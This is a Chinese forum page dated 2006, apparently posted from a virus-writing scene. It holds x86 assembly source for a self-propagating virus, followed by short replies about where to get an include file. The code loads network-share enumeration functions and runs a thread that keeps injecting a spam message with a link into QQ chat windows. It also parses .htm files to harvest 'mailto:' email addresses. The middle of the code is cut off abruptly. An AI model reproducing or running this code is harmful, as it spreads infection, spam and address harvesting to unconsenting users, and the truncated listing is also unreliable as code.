GetMprFunction proc
pushad
call szMpr
db "mpr.dll",0
szMpr:
call _LoadLibraryA[ebx]
mov edi,eax
call szWNetOpenEnum
db "WNetOpenEnumA",0
_WNetOpenEnumA dd 0
szWNetOpenEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetOpenEnumA[ebx],eax
call szWNetEnumResourceA
db "WNetEnumResourceA",0
_WNetEnumResourceA dd 0
szWNetEnumResourceA:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetEnumResourceA[ebx],eax
call szWNetCloseEnum
db "WNetCloseEnum",0
_WNetCloseEnum dd 0
szWNetCloseEnum:
push edi
call _GetProcAddress[ebx]
mov DWORD ptr _WNetCloseEnum[ebx],eax
popad
ret
GetMprFunction endp
;***********************************
;处理发送QQ消息的线程
;***********************************
QQ_Thread proc uses ebx esi edi Param:DWORD
pushad
call szMutex
MutexName db "logincom",0
szMutex:
push FALSE
push NULL
call _OpenMutex[ebx]
or eax,eax
jnz QQ_ret
lea ecx,[offset MutexName+ebx]
push ecx
push FALSE
push NULL
call _CreateMutex[ebx]
;********************************
;发送QQ消息过程
;********************************
re4:
call szWincap
db "发送消息",0
szSend db "送讯息(&S)",0
szMsg db "最感人的故事,最煽情的文章.一切尽在",0dh,0ah
db "[url]http://www.xxx.net/index.htm[/url]",0
szClass db "RICHEDIT",0
QQSend dd 0
hEdit dd 0
hSend dd 0
szWincap:
push NULL
call _FindWindowA[ebx]
mov DWORD ptr QQSend[ebx],eax
or eax,eax
jz QQ_ret
push 0
lea ecx,[offset szClass+ebx]
push ecx
push NULL
push QQSend[ebx]
call _FindWindowExA[ebx]
mov DWORD ptr hEdit[ebx],eax
lea ecx,[offset szSend+ebx]
push ecx
push NULL
push NULL
push QQSend[ebx]
call _FindWindowExA[ebx]
mov DWORD ptr hSend[ebx],eax
or eax,eax
jz QQ_ret
lea ecx,[offset szMsg+ebx]
push ecx
push 0
push WM_SETTEXT
push hEdit[ebx]
call _SendMessageA[ebx]
push 0
push 0
push BM_CLICK
push hSend[ebx]
call _SendMessageA[ebx]
push 2000
call _Sleep[ebx]
jmp re4
QQ_ret:
popad
ret
QQ_Thread endp
;*****************************************
;分析MailFileName(*.htm*),寻找Mail_Addr.
;pkxp的代码
;*****************************************
Parse_HTM PROC htmFileName :DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL SafeFSize: DWORD
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push htmFileName
call _CreateFile[ebx]
or eax,eax
jz PH_Exit
mov hFile , eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push hFile
call _CreateFileMapping[ebx]
or eax,eax
jz PH_Close
mov hMapping,eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push hMapping
call _MapViewOfFile[ebx]
or eax,eax
jz PH_Close2
xchg eax,esi ;esi = pMapping
push 0
push hFile
call _GetFileSize[ebx]
sub eax,16 ;For security
add eax,esi
mov SafeFSize,eax ;esi必须小于SafeFSize
.while esi < SafeFSize
push esi
xor edx,edx ;Valid = FALSE
@pushsz "mailto:"
pop edi
push 7 ;"mailto:" 字符串长度
pop ecx
repz cmpsb
.if zero? ;找到 mailto:
lea edi,[offset TempMailTo+ebx]
push edi
.while esi
sock sockaddr_in <0>
wfd WIN32_FIND_DATA <0>
hProcess dd 0
_GetProcessAddress dd 0
hMem dd 0
E8_addr dd 0
VirusLen=$-offset VStart
VEnd:
End VStart [/language] 请问useful.inc文件在哪下载? [quote][b]这里是引用第[/b][color=#ff0000][1 楼][/color][b]的[color=#000066]cnsword[/color]于[/b]2006-08-05 03:43[b]发表的:[/b]
请问useful.inc文件在哪下载?[/quote]
29A的杂志里有 谢谢,我去看看!
页:
[1]